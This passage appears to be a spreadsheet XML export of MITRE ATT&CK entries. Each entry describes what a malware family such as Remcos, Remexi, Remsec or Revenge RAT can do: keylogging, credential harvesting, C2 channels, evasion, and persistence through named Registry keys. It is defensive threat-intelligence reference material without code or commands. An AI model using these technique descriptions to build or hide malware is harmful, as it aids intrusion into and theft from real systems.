  <si>
    <t>relationship--385f57f4-87b6-4126-ab67-531e482ec9bc</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to modify remote Registry information.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--fe3c4134-ddef-45f8-b83a-6865a01b9764</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform uses Extended Attributes to store encrypted executables.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--1ee44004-6aaa-4b22-934d-4f4ef82cbbd4</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--fcfe071b-e527-44e9-9970-9243a354f563</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use ICMP to communicate between infected computers.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--e7ac3ee3-a014-4b07-9bad-b93d3d1d0f4b</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use Windows admin shares to move laterally.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--b98c506f-3dd3-45c1-b81a-3e23bcfe6198</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including HTTP and HTTPS.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>relationship--2fe9c7cf-44aa-495b-bde6-80cbfc4fbed9</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can capture data from the system’s microphone.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>relationship--ce85be06-0f74-480e-b55a-df92f6989902</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for UAC bypassing.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>relationship--945dface-ae29-4baa-ad2d-45c27029936a</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) steals and modifies data from the clipboard.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>relationship--441ef1f7-79b7-476a-8c1e-943439e65dd1</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can search for files on the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>relationship--cafaa08a-1f40-40cb-a3fd-c507a1cc6e40</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can upload and download files to and from the victim’s machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>relationship--ad787fb5-9d63-423d-941f-bfe7648b2e24</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for keylogging.(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>relationship--c50fd202-d4af-4157-b368-b4525af075c1</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has full control of the Registry, including the ability to modify it.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>relationship--66f2f7b3-3df9-4d4a-bedc-ecacac3039e8</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses RC4 and base64 to obfuscate data, including Registry entries and file paths.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>relationship--71a121ba-b01c-418c-af8d-63df2cec70de</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command to hide itself through injecting into another process.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>relationship--54e70260-cbf3-4c6b-bd30-208329cfef26</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>relationship--5ed5deda-543f-40f7-8f5d-df8f93c545e2</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses Python scripts.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>relationship--57966b1d-4770-49fb-afb6-b02699bb8154</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can add itself to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>relationship--1be18787-844d-4135-9781-e5b6a8e76d14</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) takes automated screenshots of the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>relationship--988a0f0f-b3dc-4ff7-8062-29d3975cb897</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) searches for Sandboxie and VMware on the system.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>relationship--8cb5d843-e5b6-416a-b721-aa6b4c1ae2f3</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can access a system’s webcam and take pictures.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>relationship--c73f5693-e40c-48a9-b41c-8207f7180523</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can launch a remote command line to execute commands on the victim’s machine.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>relationship--8f58f0fa-54ca-412e-a681-2f864e217039</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) has a command to capture active windows on the machine and retrieve window titles.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--b2cf2404-a612-4832-8dff-9f5572776785</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) encrypts and adds all gathered browser data into files for upload to C2.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--b516dc1a-69c7-4dd2-935a-b0b1dcee150f</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) collects text from the clipboard.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--5940076b-120a-4588-b227-7fe2bc9f7ccd</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) decrypts the configuration data using XOR with 25-character keys.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--85b0be36-c9fb-4359-b9b6-4e13300e374b</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) performs exfiltration over [BITSAdmin](https://attack.mitre.org/software/S0190), which is also used for the C2 channel.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--551c4e98-3dfb-472b-8fa8-6a8961dfd418</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) searches for files on the system. (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--df0cfac5-fe50-4cc3-bc47-9a1d49c53e0a</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) gathers and exfiltrates keystrokes from the machine.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--4df0f8e9-5956-4ccf-b603-00c32afee0d0</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) obfuscates its configuration data with XOR.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--555ae36b-6066-43e1-bea4-d891c1db5835</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes Run Registry keys in the HKLM hive as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--64f1da46-93a7-4e70-8702-801dbaf26206</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes scheduled tasks as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--387fa1e2-b8c5-4be4-b566-85b0525ed294</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) takes screenshots of windows of interest.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--d5b4ef43-ddb4-4f95-95b9-6a352700bb77</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses AutoIt and VBS scripts throughout its execution process.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--d08b9cb8-0f97-4933-b0de-40e4626dd13e</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses [BITSAdmin](https://attack.mitre.org/software/S0190) to communicate with the C2 server over HTTP.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--6ad392c7-3fc3-46d4-b479-5862e11a81d8</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) silently executes received commands with cmd.exe.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--47d79025-5c64-4524-b8b7-d70c341972f9</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) executes received commands with wmic.exe (for WMI commands). (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--84221e86-8ed7-42d4-878f-951cc6eaf65c</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) achieves persistence using Userinit by adding the Registry key &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt;.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>relationship--9cae28f1-dbae-406b-b205-ab9c9cbd26f5</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) copies a file over to the remote system before execution.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--b3831788-f18f-4315-997e-275e425c0d31</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new schedule task on the remote system(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--abb4a85a-d98a-46f7-965b-48d9f88fe9b6</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new service on the remote system.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--292248d9-30b0-4de3-9041-407db4e78f78</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can enumerate files and directories on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--c767aaab-168c-4585-af3e-f4fb95fede69</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can upload and download files to and from a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--e39a9d68-162f-45a3-b7c2-5914dd900b73</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can use Msiexec to install a service.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--e8537bf5-f4b6-4b37-948d-57f49eb00984</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can take screenshots on a compromised host.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--eb2f2175-9c0f-4217-b5da-7e29b882e4e2</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using DNS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--ec439835-0ccb-477e-8c58-1d8c4e8ed6ab</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a package that collects documents from any inserted USB sticks.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--8e7ff07b-7a32-4ced-ac22-b523586dbde3</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to detect active drivers of some security products.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--d77772ff-ead4-49a6-ba55-15b1ff794bd2</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can add or remove applications or ports on the Windows firewall or disable it entirely.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--8baf3f0d-0ab4-4691-8ef7-8b9af8a8069c</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can perform DLL injection.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--11247a95-272b-4ae2-8dae-2cd049328734</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>relationship--1ce50a6a-5f0b-40ca-9a71-41369ae3fdcd</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>relationship--137e1ddc-403b-49b5-a214-20b82bab446e</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--131fde9c-7a83-4603-9c1e-c41f815fb14c</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</si>
  <si>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</si>
  <si>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relationship--2b4a8be2-8403-43d4-addd-79c504e3dec8</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</si>
  <si>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</si>
  <si>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relationship--147e009d-48db-40bc-999c-70aa1e770a0c</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</si>
  <si>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</si>
  <si>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relationship--820c50f3-65e8-4a3a-a71a-e079ae8badad</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a keylogger component.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--2f5f2d31-739e-4dc5-b137-840401985244</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of users.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--9e587add-08b7-4ecb-a40a-664b9cff1d0f</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using SMTP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--560a7947-3823-4f2b-8b84-238f9a9a2552</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</si>
  <si>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</si>
  <si>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relationship--48b75b8b-5bef-4f99-baa8-5fa978d371d2</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin that can perform ARP scanning as well as port scanning.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--e6b68811-113e-4f86-8096-9f506e34dda1</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using ICMP, TCP, and UDP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>relationship--4ee54acd-fc04-43c2-8cf6-2200a802d0b9</t>
  </si>
  <si>
    <t>Some data in [Remsec](https://attack.mitre.org/software/S0125) is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--43edea0b-efb8-41ab-bdda-f5aa62de439f</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) harvests plain-text credentials as a password filter registered on domain controllers.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>relationship--46f301cd-8ae3-431a-931b-df4bb4fee271</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a process list from the victim.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--3076f49e-0db2-4652-a07d-653027aeef1e</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can ping or traceroute a remote host.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--51742efe-5f0c-4fbf-9eb7-5e765a0a408f</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) schedules the execution one of its modules by creating a new scheduler task.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--b2cf6651-3f2c-4522-9360-dbc5c7af43c5</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can dump the SAM database.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--852009ed-1b50-4b08-9e77-53f0271d995c</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin detect security products via active drivers.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--ea61c268-d0d1-4cbe-8b26-16f70f515a04</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--9b36e877-e637-46b8-bdf1-def74c977472</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--bd5b4264-1f10-4cd5-b7b0-a6a8b9dad7c3</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of active connections and open ports.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--24bce281-7858-4a42-bfd6-601800fb63f7</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about the current user.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--d1222ff7-b93c-40a7-99bd-217d795d8d58</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using HTTP and HTTPS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>relationship--d7e57ff2-f14b-44fa-97e3-8bc976cb9bd5</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) is used to poison name services to gather hashes and credentials from systems within a local network.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>relationship--aef7fe44-f381-41d5-88af-f04135e3aeab</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) captures hashes and credentials that are sent to the system after the name services have been poisoned.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>relationship--9c012fcf-876b-4101-aa28-6af8b00a51d2</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for microphone interception.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--ade8894f-e9fd-4391-98c3-d43ad2d7ab9c</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) used blogpost.com as its primary command and control server during a campaign.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--79c960d7-edf2-4005-8c0a-31acd830ca8a</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the [Forfiles](https://attack.mitre.org/software/S0193) utility to execute commands on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--b5612c39-e246-409b-97cb-57067cfa27b4</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to upload and download files.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--1f5aee41-e3bc-4ed0-a0e2-fa8f7cd6de26</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for keylogging.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--1d65c2d6-6f59-40e4-af56-83ad4d9efea8</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--9f99cba5-2fb2-4750-aca4-3d4a0a872685</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for credential harvesting.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--21537040-e89a-4908-95c2-2c5d905bcc2f</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the PowerShell command &lt;code&gt;Reflection.Assembly&lt;/code&gt; to load itself into memory to aid in execution.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--b1c4fbea-d3d4-4e9a-ab46-8683f2bde40b</t>
  </si>
  <si>
    <t xml:space="preserve">[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin to perform RDP access.(Citation: Cylance Shaheen Nov 2018)
</t>
  </si>
  <si>
    <t>relationship--5fa454cd-2fff-41ca-bfd0-0dce49d34f6d</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) schedules tasks to run malicious scripts at different intervals.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--ea8f4a2f-6c4e-451e-a107-407d0fc06459</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for screen capture.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--c67ddbdb-7e07-45b3-9f7d-5cdf959ac3b2</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses Base64 to encode information sent to the C2 server.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--6d10e49f-ebd6-47c5-9042-96bd54f7ca79</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the CPU information, OS information, and system language.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--6765828a-168f-4dd7-8c1b-00f7d98daef5</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the IP address and MAC address from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--9691e661-14fc-4eee-b7d0-14ef24bd6a27</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) gathers the username from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--01c6d850-03c2-4ed0-ba1d-cf2cc9062106</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to access the webcam.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--2dc986cb-ed76-42ba-9dd9-edaba07b0cc7</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses cmd.exe to execute commands and run scripts on the victim's machine.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>relationship--b1691566-c8c2-4d93-b5b0-3f5264608d1b</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) creates a Registry key at &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; to survive a system reboot.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--a01a08e6-3e5a-4674-9d8b-67395fdf9b55</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has added four additional bytes of data upon launching, then saved the changed version as &lt;code&gt;C:\ProgramData\Initech\Initech.exe&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--23b5fd51-bb47-4811-8a38-c768c8fa6b0e</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been executed from malicious Excel or Word documents containing macros.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--b76d4437-7d55-4369-b262-eb4ca52d6059</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted strings with a single byte XOR algorithm.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--081406d8-0486-4bfe-8d99-cd505f5cceb6</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</si>
  <si>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</si>
  <si>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relationship--52d12577-199c-41a6-92d6-28d26c023aea</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been distributed in e-mails with malicious Excel or Word documents.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--7d93f85e-52a1-4771-8378-0fabfd707ece</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted command and control (C2) communications with a stream cipher.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--7e80ade6-a566-4e2b-b2e4-021f9dd6889a</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the Windows version on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--0d557837-8936-43e7-95fd-2c30938d34d3</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the IP address of the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--24dd7ee4-83ed-4f54-808b-8b0e46797df4</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the username on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>relationship--8087182b-73c3-4efa-aad6-36498531f728</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can archive data using RC4 encryption and Base64 encoding prior to exfiltration.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--39663ad3-549e-4984-a81b-acce5cb02090</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) variants can use SSL for encrypting C2 communications.(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t>relationship--aee478b7-c5f5-4d31-8df7-bd44fca1d677</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has collected data and files from a compromised host.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--138f4287-ff95-45cd-bd65-d08708a2cbf5</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) has decrypted itself using a single-byte XOR scheme. Additionally, [Rising Sun](https://attack.mitre.org/software/S0448) can decrypt its configuration data at runtime.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--4f89d6c4-29ec-4777-bbc9-b0ea78064c42</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can send data gathered from the infected machine via HTTP POST request to the C2.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--b3aa93e7-534f-4bd7-8df7-ed9dfa8ccccc</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can delete files and artifacts it creates.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--0449ef6d-2ea2-40a3-9cc9-c07672d6a859</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</si>
  <si>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</si>
  <si>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relationship--cfaf6b8e-1ee0-40bf-8a60-27f9c68d86c5</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can modify file attributes to hide files.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--f1992fc5-5013-4fad-9a43-74a7f2b9e3ec</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can clear a memory blog in the process by overwriting it with junk bytes.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--811ba10b-6fe7-40d9-ab98-70d4135ac7cf</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can test a connection to a specified network IP address over a specified port number.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
